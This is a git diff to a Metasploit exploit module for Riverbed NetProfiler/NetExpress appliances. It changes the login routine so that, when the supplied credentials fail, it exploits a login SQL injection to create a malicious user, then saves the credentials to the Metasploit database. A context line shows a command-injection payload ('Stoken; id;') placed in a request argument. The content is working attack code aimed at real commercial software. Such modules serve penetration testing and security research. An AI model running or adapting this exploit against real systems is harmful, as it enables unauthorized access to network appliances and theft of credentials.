diff --git a/modules/exploits/linux/http/riverbed_netprofiler_netexpress_exec.rb b/modules/exploits/linux/http/riverbed_netprofiler_netexpress_exec.rb
index e9cff50052..1f771afafd 100644
--- a/modules/exploits/linux/http/riverbed_netprofiler_netexpress_exec.rb
+++ b/modules/exploits/linux/http/riverbed_netprofiler_netexpress_exec.rb
@@ -79,8 +79,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    print_status("Creating malicious user through login SQLi")
-    create_user
 
     print_status("Attempting log in to target appliance")
     @sessid = do_login
@@ -128,6 +126,83 @@ class MetasploitModule < Msf::Exploit::Remote
 
   end
 
+  def do_login
+
+    uname = datastore['RIVERBED_USER']
+    passwd = datastore['RIVERBED_PASSWORD']
+
+    nonce, sessid_cookie_preauth = get_nonce
+    post_data = "login=1&nonce=#{nonce}&uname=#{uname}&passwd=#{passwd}"
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path,'/index.php'),
+      'cookie' => "SESSID=#{sessid_cookie_preauth}",
+      'ctype' => 'application/x-www-form-urlencoded',
+      'encode_params' => false,
+      'data'     => post_data
+     })
+
+    # Exploit login SQLi if credentials are not valid.
+    if res && res.body && res.body.include?('<form name="login"')
+       print_status("Invalid credentials. Creating malicious user through login SQLi")
+
+       create_user
+       nonce, sessid_cookie_preauth = get_nonce
+       post_data = "login=1&nonce=#{nonce}&uname=#{uname}&passwd=#{passwd}"
+
+       res = send_request_cgi({
+         'method' => 'POST',
+         'uri' => normalize_uri(target_uri.path,'/index.php'),
+         'cookie' => "SESSID=#{sessid_cookie_preauth}",
+         'ctype' => 'application/x-www-form-urlencoded',
+         'encode_params' => false,
+         'data'     => post_data
+       })
+
+       sessid_cookie = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''
+       print_status("Saving login credentials into Metasploit DB")
+       report_cred(uname, passwd)
+    else
+       print_status("Valid login credentials provided. Successfully logged in")
+       sessid_cookie = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''
+       print_status("Saving login credentials into Metasploit DB")
+       report_cred(uname, passwd)
+    end
+
+    return sessid_cookie
+
+  end
+
+  def report_cred(username, password)
+    # Function used to save login credentials into Metasploit database
+    service_data = {
+      address: rhost,
+      port: rport,
+      service_name: ssl ? 'https' : 'http',
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: self.fullname,
+      origin_type: :service,
+      username: username,
+      private_data: password,
+      private_type: :password
+    }.merge(service_data)
+
+    credential_core = create_credential(credential_data)
+
+    login_data = {
+      core: credential_core,
+      last_attempted_at: DateTime.now,
+      status: Metasploit::Model::Login::Status::SUCCESSFUL
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def create_user
     # Function exploiting login SQLi to create a malicious user
     username = datastore['RIVERBED_USER']
@@ -180,34 +255,6 @@ class MetasploitModule < Msf::Exploit::Remote
     return payload
   end
 
-  def do_login
-    # Function used to login and create a valid session
-    uname = datastore['RIVERBED_USER']
-    passwd = datastore['RIVERBED_PASSWORD']
-    nonce, sessid_cookie_preauth = get_nonce
-
-    post_data = "login=1&nonce=#{nonce}&uname=#{uname}&passwd=#{passwd}"
-
-    res = send_request_cgi({
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path,'/index.php'),
-      'cookie' => "SESSID=#{sessid_cookie_preauth}",
-      'ctype' => 'application/x-www-form-urlencoded',
-      'encode_params' => false,
-      'data'     => post_data
-     })
-
-    if res && res.body && res.body.include?('<form name="login"')
-       fail_with(Failure::UnexpectedReply, 'Could not login')
-    else
-       print_status("Successfully logged in")
-       sessid_cookie = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''
-    end
-
-    return sessid_cookie
-
-  end
-
   def test_cmd_inject
     post_data = "xjxfun=get_request_key&xjxr=1457064294787&xjxargs[]=Stoken; id;"